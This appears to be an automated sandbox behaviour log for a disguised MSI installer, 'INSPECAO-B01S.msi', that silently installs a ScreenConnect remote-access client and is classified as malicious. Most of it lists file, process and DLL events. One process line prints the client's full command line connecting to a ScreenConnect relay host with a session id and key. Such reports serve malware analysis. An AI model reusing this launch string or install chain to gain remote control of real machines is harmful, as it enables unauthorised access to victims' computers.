Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\rs24xzl1.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\rs24xzl1.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\1ot0kljn.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\1ot0kljn.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\qf3laj4y.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\qf3laj4y.newcfg	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI1608.tmp

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_057285B0	6_2_057285B0
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572A6F8	6_2_0572A6F8
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572A6F8	6_2_0572A6F8
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F30040	6_2_05F30040
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F30040	6_2_05F30040
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B412302	7_2_00007FFD9B412302
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B40703D	7_2_00007FFD9B40703D
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71701B	7_2_00007FFD9B71701B
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71901C	7_2_00007FFD9B71901C
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B710428	7_2_00007FFD9B710428
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7236BD	7_2_00007FFD9B7236BD
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B716961	7_2_00007FFD9B716961
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7213E0	7_2_00007FFD9B7213E0
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71AEFD	7_2_00007FFD9B71AEFD
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B72131C	7_2_00007FFD9B72131C
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7209F2	7_2_00007FFD9B7209F2

Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs INSPECAO-B01S.msi
Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenameSfxCA.dllL vs INSPECAO-B01S.msi
Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenamewixca.dll\ vs INSPECAO-B01S.msi

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal72.evad.winMSI@15/71@3/2

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: INSPECAO-B01S.msi

Static file information: TRID: Microsoft Windows Installer (60509/1) 57.88%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\INSPECAO-B01S.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B0D9CA4E13447273575F5AF2A2A458A C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9498291156A768CDF30C7CBD1AD63E0B
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A9BFA3C15C3C22AD10EB69C2707C2272 E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-xkznvd-relay.screenconnect.com&p=443&s=e3b17808-f02f-4082-a0ad-0ef89097505d&k=BgIAAACkAABSU0ExAAgAAAEAAQBhw2Nfb6ZuPKlEDIhhDVtAYuyd858SiHfXVlo7oudUHFIakFl%2fPS5vluFfI688c%2ffI5cXvCjgFShXpqsjscRe%2bvZHKSRm%2bteuE97Q6NBZ5oegi61HDzK9%2bJY6drnQvjn5O3W4R13ZtTHxRqVi92KIEihsQur1J2%2fL4Cjo7mR%2bTf3z2FvvhBA9AI44ir3hX7T6YCeKwSXIGWSjwulU6qmSUa0YOa6ak5ubRKh%2fug0gS3wbeTgSuaLTj1hdcHea2xRvqMqyIWF1MOawExDdmH4KtYMuNWGxsLao6ChTQtObulDnOQ2rzUTbk681GAIKtEvzer9DayT7dfK5gHsogR7Cx&c=envioparaiba20%2f10&c=&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe" "RunRole" "fedb95f0-928e-4923-97ab-510c95cfca5c" "User"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B0D9CA4E13447273575F5AF2A2A458A C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9498291156A768CDF30C7CBD1AD63E0B	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A9BFA3C15C3C22AD10EB69C2707C2272 E Global\MSI0000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe" "RunRole" "fedb95f0-928e-4923-97ab-510c95cfca5c" "User"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
